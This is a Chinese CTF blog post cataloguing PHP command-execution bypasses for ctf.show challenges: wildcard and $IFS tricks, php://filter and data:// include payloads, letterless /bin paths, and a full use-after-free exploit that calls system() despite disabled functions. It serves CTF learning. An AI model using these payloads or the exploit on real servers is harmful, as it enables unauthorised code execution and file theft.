CTF命令执行

最新推荐文章于 2024-05-16 15:06:52 发布
最新推荐文章于 2024-05-16 15:06:52 发布
阅读量2.6k 收藏 34
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45086218/article/details/114240140
版权

文章目录

本文以ctf.show网站题目为例,总结ctf中的命令执行姿势

通配符

if(!preg_match("/flag/i", $c)){
        eval($c);
    }

*

c=system('cat *.php');
c=system('cat f*');

?

c=system('cat fla?????');
c=system('cat f?????hp');

[]

glob支持利用[0-9]来表示一个范围。
glob支持用[^x]的方法来构造“这个位置不是字符x”
我们可以利用[@-[]来表示大写字母

常用命令

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
反引号 同shell_exec()

cat被过滤

more:一页一页的显示档案内容
less:与 more 类似 head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看 
file -f:报错出具体内容 
grep:在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令: grep test *file strings

目录扫描

c=print_r(scandir("/"));
c=var_dump(scandir('/'));
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);

exit截断

$c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();

$s = ob_get_contents();//得到缓冲区的数据。
ob_end_clean();//会清除缓冲区的内容,并将缓冲区关闭,但不会输出内容。

可以利用exit();停止后面的程序

payload:

c=require("/flag.txt");exit();

空格被过滤

c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
c=show_source(next(array_reverse(scandir(pos(localeconv())))));

array_pop	弹出数组的值
array_reverse	返回单元顺序相反的数组
current和pos均可返回数组中的当前单元

c=echo`strings%09f*`;
c=echo`strings\$IFS\$9f*`必须加转义字符

$IFS
$IFS$1
${IFS}
$IFS$9
<     比如cat<a.tct:表示cat a.txt
<>
{cat,flag.php}  //用逗号实现了空格功能,需要用{}括起来
%20
%09

短标签

<?php system("cat flag.php");?> ==> <?=system("cat flag.php");?>

;号绕过

include不用括号,分号可以用?>代替。

c=include("/flag.txt");

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
//require
//require_once
c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

命令拼接

a=who
b=ami
$a$b //输出whoami

1>/dev/null 2>&1绕过

1>/dev/null 2>&1的含义

代表重定向到哪里,例如:echo “123” > /home/123.txt
1 表示stdout标准输出,系统默认值是1,所以">/dev/null"等同于"1>/dev/null"
2 表示stderr标准错误
& 表示等同于的意思,2>&1,表示2的输出重定向等同于1

system($c." >/dev/null 2>&1");

1>/dev/null 首先表示标准输出重定向到空设备文件,也就是不输出任何信息到终端,说白了就是不显示任何信息。
2>&1 接着,标准错误输出重定向等同于 标准输出,因为之前标准输出已经重定向到了空设备文件,所以标准错误输出也重定向到空设备文件。

我们要让命令回显,那么进行命令分隔即可
; //分号
| //只执行后面那条命令
|| //只执行前面那条命令
& //两条命令都会执行
&& //两条命令都会执行
%0a //换行

无字母/bin

https://www.cnblogs.com/NPFS/p/13797436.html

if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);

bin目录:

bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等

这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php

c=/???/????64%20????.???

看了羽大佬的WP还有一种解法

如下:payload:?c=/???/???/???2 ???.??? —》 然后在url + /flag.php.bz2

/usr/bin目录:

主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb、wget等。

我们可以利用/usr/bin下的bzip2

意思就是说我们先将flag.php文件进行压缩,然后再将其下载

无字母数字

https://blog.csdn.net/qq_46091464/article/details/108513145
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

我们可以通过post一个文件(文件里面的sh命令),在上传的过程中,通过.(点)去执行执行这个文件。(形成了条件竞争)。一般来说这个文件在linux下面保存在/tmp/php???一般后面的6个字符是随机生成的有大小写。(可以通过linux的匹配符去匹配)
注意:通过.去执行sh命令不需要有执行权限

在这里插入图片描述

用$()表示数字

在这里插入图片描述

UAF脚本

https://blog.csdn.net/qq_46091464/article/details/108670155

c=function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }


    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();
#需要通过url编码哦

其他姿势

c=echo `nl fl''ag.p''hp`
c=echo `nl fla?????`;
c=echo `nl fl\ag.php`;//转义字符绕过
c=echo(`nl%09fl[abc]*`);
c=eval($_GET[1]);&1=system('nl flag.php');
c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*");等价于system()

c=echo "1";?>ctf <?php system('ls');
c=echo "1"; ?>ctf <?php include($_GET['url']);&url=php://filter/read=convert.base64-encode/resource=flag.php

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

c=echo highlight_file('flag.php');
c=show_source("flag.php");
c=highlight_file("flag.php");
c=file_get_contents("flag.php");
Skn1fe
关注
  • 5
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1145
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
ctf_show笔记篇(web入门---命令执行
whale_waves的博客
03-02 1512
${PWD::${##}}???${PWD::${##}}?${USER:~A}?$IFS????.??? ####我的环境$USER是root,ctfshow的不是所以这里是正常的
CTF(Web)关于执行读取文件命令的相关知识与绕过技巧
最新发布
2401_84971075的博客
05-16 290
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
CTFSHOW-web入门-信息搜集,爆破,命令执行
Yb_140的博客
02-19 4910
目录 Web入门 信息搜集 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 爆破 web21 web22 web23 web24 web25 web26 web27 web28 命令执行 web29 web30 web31 web32 web33 web34 web35 web36
从一道CTF题目谈PHP命令执行
蚁景网安学院
03-11 1962
快睡的时候,打开B站发现有位用户留言,大意就是让我帮忙看一道题,正好当时有空,于是就打开了他发的链接,代码如下<?php show_source(__FILE__); $mess=...
ctfshow-命令执行
hungry1234的博客
01-25 1263
函数,其不需要括号传参(例如 include a.php)文件会被注释掉(显示不出来),所以考虑伪协议读文件。,多刷新几次即可做到无参数命令执行。一般实现方法是自增,取反,异或,或。头的信息放到一个数组里面。头的某些不重要的内容为。:匹配某个范围的字符(:只会让后面的查询没有。
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 912
CTF,ctfshow,命令执行
php突破命令限制执行系统命令
05-09
php突破命令限制执行系统命令 可以用于ctf 实战 等多领域使用 十分实用,可以用于突破system等命令被限制的时候
命令注入讲解ppt.pptx
08-10
命令执行漏洞不仅存在于 B/S 架构,也存在于 C/S 架构。本次讨论的都是 Web 命令执行漏洞。 命令注入攻击最初被关注到,是 Shell 命令注入攻击(所以最初也被称为 Shell 命令注入攻击),由挪威一名程序员...
CTF比赛的各种解题技巧
02-28
CTF比赛的各种解题技巧 CTF(Capture The Flag)是一种网络安全竞赛,旨在培养参与者的网络安全技能。CTF比赛涵盖了网络安全的多个方面,包括网络安全、Web安全、密码学、反汇编、逆向工程等。为了帮助参与者更好地...
CTF Web各种题目的解题姿势
07-27
第2章 代码执行命令执行 课时1:代码执行介绍49'32 课时2:命令执行介绍20'14 课时3:命令执行分类20'12 课时4:命令执行技巧24'30 课时5:长度限制的命令执行25'46 课时6:无数字和字母命令执行10'27 第3章...
ctfshow命令执行(web29-web56)第一部分
qq_63928796的博客
10-05 1636
过滤了flag可以用*或者?绕过。
CTFSHOW-命令执行
Monica的博客
09-03 3979
WEB29 题目: <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 分析:题目过滤了flag且忽略大小写 知识点:linux通配符 * 匹配任何字符串/文本,包括空字符串;*代表任意字符..
CTFshow命令执行
weixin_47813861的博客
08-19 513
web29 payload:?c=system('ls');查看当前文件 ?c=system('tac fla*');通过正则表达式绕过preg_match函数,查看内容 我自己是用more和cat试过,发现无法显示,后来发现在源代码显现但被注释所以无法显示在前端,用tac可以破坏注释结构,直接显示 web30 源码: if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){
正则表达式题目(ctf题)
weixin_60777183的博客
08-30 1158
题目: <?php $key='flag{********************************}'; $Regular=preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i",trim($_GET["id"]),$match); if($Regular){ die('key:'.$key); } 解答: key里面有想要的Flag,要得到key需要$Regular大于0,$Regular变量用了”preg_...
CTFSHOW-PHP特性
Yb_140的博客
04-23 2997
web89 intval()函数:用于获取变量的整数值。 ?num[]= web90 ?num=0x117c ?num=4476a web91 preg_match('/^php$/im', $a) php开头,php结尾,i大小写,m多行匹配 ?cmd=%0aphp web92 ?num=0x117c ?num=010574 web93 ?num=010574 web94 strpos()函数:函数查找字符串在另一字符串第一次出现的位置 ?n
CTF命令执行RCE
qq_53099119的博客
04-02 2591
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
ctf 命令执行总结
njqfb的博客
06-04 2752
命令执行绕过总结 linux系统查看文件命令 more 一页一页的显示文件内容 less 和more类似 head 只显示头几行 tail 只显示最后几行 nl 显示时还输出行号 tailf cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 od 以二进制的方式读取内容 vi 编辑文件 vim 编辑文件,是vi的升级版 sort 将以默认的方式将文本文件的第一列以ASCI
ctfshow-web41~60-WP
02-21
这使得攻击者无法直接看到命令执行的结果。在这种情况下,可以尝试使用命令分隔符,如分号(;)或逻辑或操作符(||),将多个命令写在一个payload,使得第一个命令(导致无回显)被执行,而第二个命令(如输出flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值